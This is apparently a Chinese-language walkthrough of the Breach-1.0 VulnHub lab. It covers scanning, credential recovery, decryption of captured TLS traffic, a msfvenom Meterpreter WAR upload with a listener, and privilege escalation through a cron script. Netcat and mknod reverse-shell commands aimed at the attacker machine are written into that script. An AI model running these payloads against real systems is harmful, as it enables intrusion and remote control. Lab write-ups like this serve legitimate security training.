下载地址:
下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip
端口扫描
因为这个靶机,按照配置需求,我们已经知道了他的ip,所以我们直接开始端口扫描
nmap -T4 -A -v 192.168.110.140nmap -T4 -A -v 192.168.110.140nmap -T4 -A -v 192.168.110.140
但是,和我们想的有点出入,扫出来端口有点多,估计是不让我们进行端口扫描

没办法,我们先打开自己最喜欢的80
吧

查看源码
右键查看源代码,或者F12
,我们可以看见有一段注释

看起来像是加密,管他的,直接解密再说,经过两次解密,成功获得一下内容

pgibbons:damnitfeel$goodtobeagang$tapgibbons:damnitfeel$goodtobeagang$tapgibbons:damnitfeel$goodtobeagang$ta
盲猜是一个账号密码,现在找找有什么地方可以进去
点开刚刚的帅哥图片,我们进去另外一个新的网页,一顿乱点,我们进入了一次cms系统


目录扫描
dirb http://192.168.110.140dirb http://192.168.110.140dirb http://192.168.110.140
通过扫描,我们没有发现扫描其他有用的目录

成功使用刚刚的密码,进入系统

出现一个目录系统,管他的,先看看有没有可以使用的
扫描漏洞
对于开源cms系统,我们可以去扫描已知开源漏洞,接下来打开msf

虽然扫出来几个漏洞,但是没办法使用
现在只能再来看看cms里面还有没有什么好东西可以利用
突然看见有几份邮件

我们看见这里有一个.keystore
文件

接着我们有发现了这样一个文件,是wireshark
的流量包

并且发现一个密码”tomcat
“,接下来,我们解密这个keystore
使用命令,拿到证书,我们导入wireshark
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcatkeytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcatkeytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat

编辑–首选项–protocals–TLS –edit

对流量进行过滤
ip.src==192.168.110.140 || ip.dst == 192.168.110.140 and httpip.src==192.168.110.140 || ip.dst == 192.168.110.140 and httpip.src==192.168.110.140 || ip.dst == 192.168.110.140 and http
解密后,得到这样一个地址
![图片[15]-kali渗透综合靶机–Breach-1.0靶机-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/03/image-212-1024x187.png)
浏览器却打不开,提示非安全链接。。。。

接下来,我们使用burp来进行代理绕过证书 限制
接下来,就可以进去了

出现一个登录框

通过浏览抓包,接着找到账号密码

我们进入新的管理应用后台

这里有个上传的文件地方,我们来上传木马

创建war包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.warmsfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.warmsfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.war
设置msfconsole监听
依次输入一下代码
use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset lhost 192.168.110.129set lport 7777exploituse exploit/multi/handler set payload java/meterpreter/reverse_tcp set lhost 192.168.110.129 set lport 7777 exploituse exploit/multi/handler set payload java/meterpreter/reverse_tcp set lhost 192.168.110.129 set lport 7777 exploit

快速上传kali.war
并且访问,成功获取权限

metersploit默认不能交互式shell,但是如何安装了python,可以使用一下命令进行切换
python -c \'import pty;pty.spawn(\"/bin/bash\")\'python -c \'import pty;pty.spawn(\"/bin/bash\")\'python -c \'import pty;pty.spawn(\"/bin/bash\")\'

然后我们查看到该网站为apache部署的,Apache默认网站在/var/www
下面
发现一个mysql数据库,并且知道数据库为root,密码为空

使用一下代码获得用户密码
show databases;use mysql;show tables;select user,password from user;show databases; use mysql; show tables; select user,password from user;show databases; use mysql; show tables; select user,password from user;

通过MD5
解密获得,milton
的密码为thelaststraw

从历史命令里面空间,他切换过用户,但是密码确实离谱,来源于以前的那一堆图片里面,使用的图片隐写

将图片都下载下了之后,使用exiftool
工具获取到隐藏文件信息
exiftool * | grep -i -e \'File Name\' -e \'Comment\'exiftool * | grep -i -e \'File Name\' -e \'Comment\'exiftool * | grep -i -e \'File Name\' -e \'Comment\'

接着我们成功进入blumbergh

通过我们查看历史,我们发现一个定时任务,可以借此来新建反弹shell

kali再新建一个监听 nc -lvvp 5555

先将反弹shell命令写入shell.txt文件,nc反弹命令
echo \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txtecho \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txtecho \"nc -e /bin/bash 192.168.110.129 5555\" > shell.txt
再使用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.shcat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.shcat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
也可以用mknod backpipe p && nc 192.168.110.129 2222 0<backpipe | /bin/bash 1>backpipe
反弹shell
查看tidyup.sh文件写入成功:cat /usr/share/cleanup/tidyup.sh
成功获取root权限

暂无评论内容